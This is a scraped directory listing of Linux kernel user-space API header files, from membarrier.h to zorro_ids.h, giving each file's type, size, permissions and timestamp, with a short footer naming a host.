membarrier.h
text/x-c
7.71 KB
-rw-r--r--
2025-12-08 09:06:40
memfd.h
text/x-c
1.29 KB
-rw-r--r--
2025-12-08 09:06:42
mempolicy.h
text/x-c
2.18 KB
-rw-r--r--
2025-12-08 09:06:42
meye.h
text/x-c
2.47 KB
-rw-r--r--
2025-12-08 09:06:41
mic_common.h
text/x-c
6.37 KB
-rw-r--r--
2025-12-08 09:06:42
mic_ioctl.h
text/x-c
2.2 KB
-rw-r--r--
2025-12-08 09:06:41
mii.h
text/x-c
9.27 KB
-rw-r--r--
2025-12-08 09:06:42
minix_fs.h
text/x-c
2.07 KB
-rw-r--r--
2025-12-08 09:06:41
mman.h
text/x-c
1.35 KB
-rw-r--r--
2025-12-08 09:06:41
mmtimer.h
text/x-c
2.07 KB
-rw-r--r--
2025-12-08 09:06:41
module.h
text/x-c
255 B
-rw-r--r--
2025-12-08 09:06:42
mount.h
text/x-c
4.44 KB
-rw-r--r--
2025-12-08 09:06:41
mpls.h
text/x-c
2.25 KB
-rw-r--r--
2025-12-08 09:06:42
mpls_iptunnel.h
text/x-c
761 B
-rw-r--r--
2025-12-08 09:06:43
mptcp.h
text/x-c
5.48 KB
-rw-r--r--
2025-12-08 09:06:42
mqueue.h
text/x-c
2.15 KB
-rw-r--r--
2025-12-08 09:06:42
mroute.h
text/x-c
5.3 KB
-rw-r--r--
2025-12-08 09:06:41
mroute6.h
text/x-c
4.47 KB
-rw-r--r--
2025-12-08 09:06:41
mrp_bridge.h
text/x-c
1.67 KB
-rw-r--r--
2025-12-08 09:06:41
msdos_fs.h
text/x-c
6.8 KB
-rw-r--r--
2025-12-08 09:06:41
msg.h
text/x-c
3.29 KB
-rw-r--r--
2025-12-08 09:06:41
mtio.h
text/x-c
7.98 KB
-rw-r--r--
2025-12-08 09:06:42
n_r3964.h
text/x-c
2.35 KB
-rw-r--r--
2025-12-08 09:06:42
nbd-netlink.h
text/x-c
2.35 KB
-rw-r--r--
2025-12-08 09:06:42
nbd.h
text/x-c
2.95 KB
-rw-r--r--
2025-12-08 09:06:42
ncsi.h
text/x-c
3.79 KB
-rw-r--r--
2025-12-08 09:06:42
ndctl.h
text/x-c
6.71 KB
-rw-r--r--
2025-12-08 09:06:42
neighbour.h
text/x-c
5.02 KB
-rw-r--r--
2025-12-08 09:06:42
net.h
text/x-c
2.04 KB
-rw-r--r--
2025-12-08 09:06:41
net_dropmon.h
text/x-c
2.85 KB
-rw-r--r--
2025-12-08 09:06:42
net_namespace.h
text/x-c
715 B
-rw-r--r--
2025-12-08 09:06:41
net_tstamp.h
text/x-c
5.67 KB
-rw-r--r--
2025-12-08 09:06:42
netconf.h
text/x-c
614 B
-rw-r--r--
2025-12-08 09:06:43
netdevice.h
text/x-c
2.2 KB
-rw-r--r--
2025-12-08 09:06:42
netfilter.h
text/x-c
1.78 KB
-rw-r--r--
2025-12-08 09:06:42
netfilter_arp.h
text/x-c
445 B
-rw-r--r--
2025-12-08 09:06:41
netfilter_bridge.h
text/x-c
1.14 KB
-rw-r--r--
2025-12-08 09:06:42
netfilter_decnet.h
text/x-c
1.93 KB
-rw-r--r--
2025-12-08 09:06:42
netfilter_ipv4.h
text/x-c
2.12 KB
-rw-r--r--
2025-12-08 09:06:41
netfilter_ipv6.h
text/x-c
2.14 KB
-rw-r--r--
2025-12-08 09:06:41
netlink.h
text/x-c
11.23 KB
-rw-r--r--
2025-12-08 09:06:43
netlink_diag.h
text/x-c
1.49 KB
-rw-r--r--
2025-12-08 09:06:43
netrom.h
text/x-c
807 B
-rw-r--r--
2025-12-08 09:06:42
nexthop.h
text/x-c
1.5 KB
-rw-r--r--
2025-12-08 09:06:40
nfc.h
text/x-c
10.95 KB
-rw-r--r--
2025-12-08 09:06:41
nfs.h
text/x-c
4.39 KB
-rw-r--r--
2025-12-08 09:06:41
nfs2.h
text/x-c
1.43 KB
-rw-r--r--
2025-12-08 09:06:42
nfs3.h
text/x-c
2.4 KB
-rw-r--r--
2025-12-08 09:06:41
nfs4.h
text/x-c
6.44 KB
-rw-r--r--
2025-12-08 09:06:42
nfs4_mount.h
text/x-c
1.89 KB
-rw-r--r--
2025-12-08 09:06:41
nfs_fs.h
text/x-c
1.6 KB
-rw-r--r--
2025-12-08 09:06:41
nfs_idmap.h
text/x-c
2.19 KB
-rw-r--r--
2025-12-08 09:06:42
nfs_mount.h
text/x-c
2.09 KB
-rw-r--r--
2025-12-08 09:06:40
nfsacl.h
text/x-c
718 B
-rw-r--r--
2025-12-08 09:06:41
nilfs2_api.h
text/x-c
7.41 KB
-rw-r--r--
2025-12-08 09:06:41
nilfs2_ondisk.h
text/x-c
17.61 KB
-rw-r--r--
2025-12-08 09:06:41
nitro_enclaves.h
text/x-c
12.84 KB
-rw-r--r--
2025-12-08 09:06:42
nl80211.h
text/x-c
327.41 KB
-rw-r--r--
2025-12-08 09:06:41
nsfs.h
text/x-c
639 B
-rw-r--r--
2025-12-08 09:06:41
nubus.h
text/x-c
8 KB
-rw-r--r--
2025-12-08 09:06:42
nvme_ioctl.h
text/x-c
2.06 KB
-rw-r--r--
2025-12-08 09:06:41
nvram.h
text/x-c
532 B
-rw-r--r--
2025-12-08 09:06:42
omap3isp.h
text/x-c
20.36 KB
-rw-r--r--
2025-12-08 09:06:41
omapfb.h
text/x-c
5.78 KB
-rw-r--r--
2025-12-08 09:06:41
oom.h
text/x-c
511 B
-rw-r--r--
2025-12-08 09:06:42
openat2.h
text/x-c
1.26 KB
-rw-r--r--
2025-12-08 09:06:42
openvswitch.h
text/x-c
39.24 KB
-rw-r--r--
2025-12-08 09:06:41
packet_diag.h
text/x-c
1.63 KB
-rw-r--r--
2025-12-08 09:06:41
param.h
text/x-c
141 B
-rw-r--r--
2025-12-08 09:06:40
parport.h
text/x-c
3.56 KB
-rw-r--r--
2025-12-08 09:06:42
patchkey.h
text/x-c
892 B
-rw-r--r--
2025-12-08 09:06:42
pci.h
text/x-c
1.35 KB
-rw-r--r--
2025-12-08 09:06:41
pci_regs.h
text/x-c
56.47 KB
-rw-r--r--
2025-12-08 09:06:41
pcitest.h
text/x-c
711 B
-rw-r--r--
2025-12-08 09:06:41
perf_event.h
text/x-c
39.63 KB
-rw-r--r--
2025-12-08 09:06:41
personality.h
text/x-c
2.05 KB
-rw-r--r--
2025-12-08 09:06:43
pfkeyv2.h
text/x-c
10.32 KB
-rw-r--r--
2025-12-08 09:06:42
pfrut.h
text/x-c
7.8 KB
-rw-r--r--
2025-12-08 09:06:42
pg.h
text/x-c
2.34 KB
-rw-r--r--
2025-12-08 09:06:41
phantom.h
text/x-c
1.62 KB
-rw-r--r--
2025-12-08 09:06:42
phonet.h
text/x-c
4.57 KB
-rw-r--r--
2025-12-08 09:06:40
pkt_cls.h
text/x-c
18.08 KB
-rw-r--r--
2025-12-08 09:06:43
pkt_sched.h
text/x-c
29.59 KB
-rw-r--r--
2025-12-08 09:06:42
pktcdvd.h
text/x-c
2.62 KB
-rw-r--r--
2025-12-08 09:06:41
pmu.h
text/x-c
5.19 KB
-rw-r--r--
2025-12-08 09:06:42
poll.h
text/x-c
22 B
-rw-r--r--
2025-12-08 09:06:43
posix_acl.h
text/x-c
1.22 KB
-rw-r--r--
2025-12-08 09:06:41
posix_acl_xattr.h
text/x-c
1.09 KB
-rw-r--r--
2025-12-08 09:06:43
posix_types.h
text/x-c
1.07 KB
-rw-r--r--
2025-12-08 09:06:40
ppdev.h
text/x-c
3.14 KB
-rw-r--r--
2025-12-08 09:06:42
ppp-comp.h
text/x-c
2.47 KB
-rw-r--r--
2025-12-08 09:06:41
ppp-ioctl.h
text/x-c
5.35 KB
-rw-r--r--
2025-12-08 09:06:41
ppp_defs.h
text/x-c
4.99 KB
-rw-r--r--
2025-12-08 09:06:42
pps.h
text/x-c
4.62 KB
-rw-r--r--
2025-12-08 09:06:42
pr.h
text/x-c
1.05 KB
-rw-r--r--
2025-12-08 09:06:41
prctl.h
text/x-c
7.83 KB
-rw-r--r--
2025-12-08 09:06:42
psample.h
text/x-c
2.22 KB
-rw-r--r--
2025-12-08 09:06:41
psci.h
text/x-c
4.23 KB
-rw-r--r--
2025-12-08 09:06:43
psp-sev.h
text/x-c
4.48 KB
-rw-r--r--
2025-12-08 09:06:42
ptp_clock.h
text/x-c
7.28 KB
-rw-r--r--
2025-12-08 09:06:40
ptrace.h
text/x-c
3.59 KB
-rw-r--r--
2025-12-08 09:06:42
qemu_fw_cfg.h
text/x-c
2.41 KB
-rw-r--r--
2025-12-08 09:06:43
qnx4_fs.h
text/x-c
2.27 KB
-rw-r--r--
2025-12-08 09:06:42
qnxtypes.h
text/x-c
624 B
-rw-r--r--
2025-12-08 09:06:42
qrtr.h
text/x-c
893 B
-rw-r--r--
2025-12-08 09:06:41
quota.h
text/x-c
6.14 KB
-rw-r--r--
2025-12-08 09:06:40
radeonfb.h
text/x-c
360 B
-rw-r--r--
2025-12-08 09:06:42
random.h
text/x-c
1.34 KB
-rw-r--r--
2025-12-08 09:06:42
raw.h
text/x-c
365 B
-rw-r--r--
2025-12-08 09:06:43
rds.h
text/x-c
9.08 KB
-rw-r--r--
2025-12-08 09:06:43
reboot.h
text/x-c
1.31 KB
-rw-r--r--
2025-12-08 09:06:42
reiserfs_fs.h
text/x-c
775 B
-rw-r--r--
2025-12-08 09:06:40
reiserfs_xattr.h
text/x-c
533 B
-rw-r--r--
2025-12-08 09:06:42
resource.h
text/x-c
2.29 KB
-rw-r--r--
2025-12-08 09:06:40
rfkill.h
text/x-c
6.45 KB
-rw-r--r--
2025-12-08 09:06:41
rio_cm_cdev.h
text/x-c
3.17 KB
-rw-r--r--
2025-12-08 09:06:40
rio_mport_cdev.h
text/x-c
9.11 KB
-rw-r--r--
2025-12-08 09:06:42
romfs_fs.h
text/x-c
1.21 KB
-rw-r--r--
2025-12-08 09:06:42
rose.h
text/x-c
2.18 KB
-rw-r--r--
2025-12-08 09:06:42
route.h
text/x-c
2.28 KB
-rw-r--r--
2025-12-08 09:06:42
rpmsg.h
text/x-c
544 B
-rw-r--r--
2025-12-08 09:06:43
rseq.h
text/x-c
4.79 KB
-rw-r--r--
2025-12-08 09:06:41
rtc.h
text/x-c
3.92 KB
-rw-r--r--
2025-12-08 09:06:41
rtnetlink.h
text/x-c
19.73 KB
-rw-r--r--
2025-12-08 09:06:42
rxrpc.h
text/x-c
4.96 KB
-rw-r--r--
2025-12-08 09:06:42
scc.h
text/x-c
4.49 KB
-rw-r--r--
2025-12-08 09:06:41
sched.h
text/x-c
2.73 KB
-rw-r--r--
2025-12-08 09:06:40
scif_ioctl.h
text/x-c
6.23 KB
-rw-r--r--
2025-12-08 09:06:42
screen_info.h
text/x-c
2.42 KB
-rw-r--r--
2025-12-08 09:06:42
sctp.h
text/x-c
35.15 KB
-rw-r--r--
2025-12-08 09:06:41
sdla.h
text/x-c
2.77 KB
-rw-r--r--
2025-12-08 09:06:42
seccomp.h
text/x-c
2.2 KB
-rw-r--r--
2025-12-08 09:06:43
securebits.h
text/x-c
2.64 KB
-rw-r--r--
2025-12-08 09:06:41
sed-opal.h
text/x-c
3.2 KB
-rw-r--r--
2025-12-08 09:06:40
seg6.h
text/x-c
1.14 KB
-rw-r--r--
2025-12-08 09:06:42
seg6_genl.h
text/x-c
589 B
-rw-r--r--
2025-12-08 09:06:41
seg6_hmac.h
text/x-c
423 B
-rw-r--r--
2025-12-08 09:06:42
seg6_iptunnel.h
text/x-c
927 B
-rw-r--r--
2025-12-08 09:06:41
seg6_local.h
text/x-c
2.01 KB
-rw-r--r--
2025-12-08 09:06:41
selinux_netlink.h
text/x-c
1.17 KB
-rw-r--r--
2025-12-08 09:06:42
sem.h
text/x-c
2.97 KB
-rw-r--r--
2025-12-08 09:06:41
serial.h
text/x-c
3.78 KB
-rw-r--r--
2025-12-08 09:06:42
serial_core.h
text/x-c
6.1 KB
-rw-r--r--
2025-12-08 09:06:42
serial_reg.h
text/x-c
15.13 KB
-rw-r--r--
2025-12-08 09:06:41
serio.h
text/x-c
1.99 KB
-rw-r--r--
2025-12-08 09:06:42
sev-guest.h
text/x-c
2.25 KB
-rw-r--r--
2025-12-08 09:06:42
shm.h
text/x-c
3.7 KB
-rw-r--r--
2025-12-08 09:06:42
signal.h
text/x-c
388 B
-rw-r--r--
2025-12-08 09:06:43
signalfd.h
text/x-c
1.2 KB
-rw-r--r--
2025-12-08 09:06:41
smc.h
text/x-c
8.31 KB
-rw-r--r--
2025-12-08 09:06:42
smc_diag.h
text/x-c
2.66 KB
-rw-r--r--
2025-12-08 09:06:41
smiapp.h
text/x-c
1.03 KB
-rw-r--r--
2025-12-08 09:06:42
snmp.h
text/x-c
13.34 KB
-rw-r--r--
2025-12-08 09:06:42
sock_diag.h
text/x-c
1.27 KB
-rw-r--r--
2025-12-08 09:06:41
socket.h
text/x-c
901 B
-rw-r--r--
2025-12-08 09:06:42
sockios.h
text/x-c
5.96 KB
-rw-r--r--
2025-12-08 09:06:42
sonet.h
text/x-c
2.24 KB
-rw-r--r--
2025-12-08 09:06:41
sonypi.h
text/x-c
5.18 KB
-rw-r--r--
2025-12-08 09:06:42
sound.h
text/x-c
1.21 KB
-rw-r--r--
2025-12-08 09:06:40
soundcard.h
text/x-c
44.96 KB
-rw-r--r--
2025-12-08 09:06:41
stat.h
text/x-c
6.2 KB
-rw-r--r--
2025-12-08 09:06:41
stddef.h
text/x-c
1.5 KB
-rw-r--r--
2025-12-08 09:06:41
stm.h
text/x-c
1.25 KB
-rw-r--r--
2025-12-08 09:06:41
string.h
text/x-c
238 B
-rw-r--r--
2025-12-08 09:06:42
suspend_ioctls.h
text/x-c
1.4 KB
-rw-r--r--
2025-12-08 09:06:41
swab.h
text/x-c
6.76 KB
-rw-r--r--
2025-12-08 09:06:42
switchtec_ioctl.h
text/x-c
5.14 KB
-rw-r--r--
2025-12-08 09:06:43
sync_file.h
text/x-c
2.82 KB
-rw-r--r--
2025-12-08 09:06:41
synclink.h
text/x-c
8.77 KB
-rw-r--r--
2025-12-08 09:06:43
sysctl.h
text/x-c
25.24 KB
-rw-r--r--
2025-12-08 09:06:41
sysinfo.h
text/x-c
1.02 KB
-rw-r--r--
2025-12-08 09:06:42
target_core_user.h
text/x-c
4.52 KB
-rw-r--r--
2025-12-08 09:06:43
taskstats.h
text/x-c
7.01 KB
-rw-r--r--
2025-12-08 09:06:42
tcp.h
text/x-c
9.69 KB
-rw-r--r--
2025-12-08 09:06:41
tcp_metrics.h
text/x-c
1.51 KB
-rw-r--r--
2025-12-08 09:06:42
tdx-guest.h
text/x-c
1.27 KB
-rw-r--r--
2025-12-08 09:06:43
tee.h
text/x-c
12.86 KB
-rw-r--r--
2025-12-08 09:06:42
termios.h
text/x-c
506 B
-rw-r--r--
2025-12-08 09:06:41
thermal.h
text/x-c
3.23 KB
-rw-r--r--
2025-12-08 09:06:42
time.h
text/x-c
1.71 KB
-rw-r--r--
2025-12-08 09:06:41
time_types.h
text/x-c
1.15 KB
-rw-r--r--
2025-12-08 09:06:43
timerfd.h
text/x-c
936 B
-rw-r--r--
2025-12-08 09:06:40
times.h
text/x-c
278 B
-rw-r--r--
2025-12-08 09:06:41
timex.h
text/x-c
6.25 KB
-rw-r--r--
2025-12-08 09:06:42
tiocl.h
text/x-c
1.69 KB
-rw-r--r--
2025-12-08 09:06:40
tipc.h
text/x-c
8.62 KB
-rw-r--r--
2025-12-08 09:06:42
tipc_config.h
text/x-c
14.36 KB
-rw-r--r--
2025-12-08 09:06:42
tipc_netlink.h
text/x-c
9.17 KB
-rw-r--r--
2025-12-08 09:06:42
tipc_sockets_diag.h
text/x-c
468 B
-rw-r--r--
2025-12-08 09:06:41
tls.h
text/x-c
4.19 KB
-rw-r--r--
2025-12-08 09:06:42
toshiba.h
text/x-c
1.88 KB
-rw-r--r--
2025-12-08 09:06:41
tty.h
text/x-c
1.55 KB
-rw-r--r--
2025-12-08 09:06:41
tty_flags.h
text/x-c
4.42 KB
-rw-r--r--
2025-12-08 09:06:41
types.h
text/x-c
1.44 KB
-rw-r--r--
2025-12-08 09:06:41
udf_fs_i.h
text/x-c
697 B
-rw-r--r--
2025-12-08 09:06:42
udp.h
text/x-c
1.62 KB
-rw-r--r--
2025-12-08 09:06:42
uhid.h
text/x-c
4.54 KB
-rw-r--r--
2025-12-08 09:06:41
uinput.h
text/x-c
9.04 KB
-rw-r--r--
2025-12-08 09:06:42
uio.h
text/x-c
732 B
-rw-r--r--
2025-12-08 09:06:42
uleds.h
text/x-c
798 B
-rw-r--r--
2025-12-08 09:06:41
ultrasound.h
text/x-c
4.46 KB
-rw-r--r--
2025-12-08 09:06:43
un.h
text/x-c
384 B
-rw-r--r--
2025-12-08 09:06:43
unistd.h
text/x-c
220 B
-rw-r--r--
2025-12-08 09:06:42
unix_diag.h
text/x-c
1.22 KB
-rw-r--r--
2025-12-08 09:06:43
usbdevice_fs.h
text/x-c
8.12 KB
-rw-r--r--
2025-12-08 09:06:42
usbip.h
text/x-c
640 B
-rw-r--r--
2025-12-08 09:06:40
userfaultfd.h
text/x-c
7.59 KB
-rw-r--r--
2025-12-08 09:06:42
userio.h
text/x-c
1.48 KB
-rw-r--r--
2025-12-08 09:06:42
utime.h
text/x-c
215 B
-rw-r--r--
2025-12-08 09:06:40
utsname.h
text/x-c
669 B
-rw-r--r--
2025-12-08 09:06:43
uuid.h
text/x-c
1.32 KB
-rw-r--r--
2025-12-08 09:06:41
uvcvideo.h
text/x-c
2.57 KB
-rw-r--r--
2025-12-08 09:06:41
v4l2-common.h
text/x-c
4.08 KB
-rw-r--r--
2025-12-08 09:06:40
v4l2-controls.h
text/x-c
50.56 KB
-rw-r--r--
2025-12-08 09:06:41
v4l2-dv-timings.h
text/x-c
30.82 KB
-rw-r--r--
2025-12-08 09:06:42
v4l2-mediabus.h
text/x-c
4.98 KB
-rw-r--r--
2025-12-08 09:06:42
v4l2-subdev.h
text/x-c
5.95 KB
-rw-r--r--
2025-12-08 09:06:41
vbox_err.h
text/x-c
7.09 KB
-rw-r--r--
2025-12-08 09:06:42
vbox_vmmdev_types.h
text/x-c
8.16 KB
-rw-r--r--
2025-12-08 09:06:41
vboxguest.h
text/x-c
8.52 KB
-rw-r--r--
2025-12-08 09:06:43
vdpa.h
text/x-c
1.39 KB
-rw-r--r--
2025-12-08 09:06:41
version.h
text/plain
430 B
-rw-r--r--
2025-12-08 09:07:26
veth.h
text/x-c
224 B
-rw-r--r--
2025-12-08 09:06:43
vfio.h
text/x-c
51 KB
-rw-r--r--
2025-12-08 09:06:41
vfio_ccw.h
text/x-c
1.29 KB
-rw-r--r--
2025-12-08 09:06:43
vfio_zdev.h
text/x-c
2.48 KB
-rw-r--r--
2025-12-08 09:06:41
vhost.h
text/x-c
6.27 KB
-rw-r--r--
2025-12-08 09:06:41
vhost_types.h
text/x-c
3.9 KB
-rw-r--r--
2025-12-08 09:06:42
videodev2.h
text/x-c
88.61 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_9p.h
text/x-c
1.99 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_balloon.h
text/x-c
5.15 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_blk.h
text/x-c
6.64 KB
-rw-r--r--
2025-12-08 09:06:42
virtio_bt.h
text/x-c
772 B
-rw-r--r--
2025-12-08 09:06:42
virtio_config.h
text/x-c
3.91 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_console.h
text/x-c
3.06 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_crypto.h
text/x-c
13.55 KB
-rw-r--r--
2025-12-08 09:06:40
virtio_fs.h
text/x-c
572 B
-rw-r--r--
2025-12-08 09:06:42
virtio_gpu.h
text/x-c
11.19 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_ids.h
text/x-c
3.19 KB
-rw-r--r--
2025-12-08 09:06:42
virtio_input.h
text/x-c
2.45 KB
-rw-r--r--
2025-12-08 09:06:42
virtio_iommu.h
text/x-c
3.69 KB
-rw-r--r--
2025-12-08 09:06:42
virtio_mem.h
text/x-c
6.99 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_mmio.h
text/x-c
4.85 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_net.h
text/x-c
10.3 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_pci.h
text/x-c
7.23 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_ring.h
text/x-c
7.32 KB
-rw-r--r--
2025-12-08 09:06:43
virtio_rng.h
text/x-c
265 B
-rw-r--r--
2025-12-08 09:06:43
virtio_scsi.h
text/x-c
5.89 KB
-rw-r--r--
2025-12-08 09:06:42
virtio_snd.h
text/x-c
9.09 KB
-rw-r--r--
2025-12-08 09:06:41
virtio_types.h
text/x-c
2.1 KB
-rw-r--r--
2025-12-08 09:06:42
virtio_vsock.h
text/x-c
3.01 KB
-rw-r--r--
2025-12-08 09:06:42
vm_sockets.h
text/x-c
6.34 KB
-rw-r--r--
2025-12-08 09:06:40
vm_sockets_diag.h
text/x-c
963 B
-rw-r--r--
2025-12-08 09:06:43
vmcore.h
text/x-c
431 B
-rw-r--r--
2025-12-08 09:06:41
vsockmon.h
text/x-c
1.84 KB
-rw-r--r--
2025-12-08 09:06:42
vt.h
text/x-c
2.99 KB
-rw-r--r--
2025-12-08 09:06:42
vtpm_proxy.h
text/x-c
1.68 KB
-rw-r--r--
2025-12-08 09:06:41
wait.h
text/x-c
682 B
-rw-r--r--
2025-12-08 09:06:42
wanrouter.h
text/x-c
453 B
-rw-r--r--
2025-12-08 09:06:42
watchdog.h
text/x-c
2.28 KB
-rw-r--r--
2025-12-08 09:06:42
wimax.h
text/x-c
8.17 KB
-rw-r--r--
2025-12-08 09:06:42
wireless.h
text/x-c
41.7 KB
-rw-r--r--
2025-12-08 09:06:41
wmi.h
text/x-c
1.84 KB
-rw-r--r--
2025-12-08 09:06:42
x25.h
text/x-c
3.48 KB
-rw-r--r--
2025-12-08 09:06:42
xattr.h
text/x-c
2.79 KB
-rw-r--r--
2025-12-08 09:06:41
xdp_diag.h
text/x-c
1.43 KB
-rw-r--r--
2025-12-08 09:06:42
xfrm.h
text/x-c
11.71 KB
-rw-r--r--
2025-12-08 09:06:42
xilinx-v4l2-controls.h
text/x-c
2.91 KB
-rw-r--r--
2025-12-08 09:06:42
zorro.h
text/x-c
3.22 KB
-rw-r--r--
2025-12-08 09:06:42
zorro_ids.h
text/plain
29.26 KB
-rw-r--r--
2025-12-08 09:06:42
~ ACUPOFTEA - accounting.gulfstore-gcc.com